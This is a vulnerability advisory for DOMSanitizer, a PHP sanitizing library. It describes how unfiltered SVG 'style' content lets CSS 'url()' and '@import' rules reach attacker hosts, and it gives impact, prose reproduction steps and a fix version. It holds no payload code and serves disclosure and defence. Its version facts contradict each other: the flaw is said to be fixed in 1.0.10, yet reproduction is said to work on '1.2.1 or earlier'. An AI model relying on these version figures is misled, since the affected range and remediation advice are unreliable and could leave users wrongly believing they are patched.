DOMSanitizer CSS Injection Vulnerability via Unfiltered SVG Style Content

A CSS injection vulnerability has been identified in DOMSanitizer, a library for sanitizing DOM, SVG, and MathML content in PHP 7.3 and later. Prior to version 1.0.10, the 'sanitize' method allowed 'style' elements in SVG content but failed to inspect their text. This oversight permitted CSS 'url()' references and '@import' rules to pass through unfiltered. When the sanitized SVG is rendered, it can trigger HTTP requests to attacker-controlled hosts. The vulnerability arises because the 'style' tag is included in the allowed SVG elements, yet its content is not properly sanitized, allowing external resource requests.

Impact

Exploitation of this vulnerability could lead to unauthorized HTTP requests being made to attacker-controlled servers when the sanitized SVG is rendered in a browser. This could be used to exfiltrate information such as the page URL or to load malicious stylesheets. Additionally, in some browsers, it could facilitate the leakage of cookie or session token values through CSS attribute-selector tricks.

Reproduction

To reproduce this vulnerability, use DOMSanitizer version 1.2.1 or earlier. Pass an SVG string containing a 'style' element with unfiltered 'url()' references or '@import' rules into the 'sanitize' method. The 'style' element will be allowed but its content will not be inspected, resulting in the 'url()' references or '@import' rules being executed when the SVG is rendered in a browser.

Remediation

Users can update to DOMSanitizer version 1.0.10 or later, where this vulnerability has been fixed.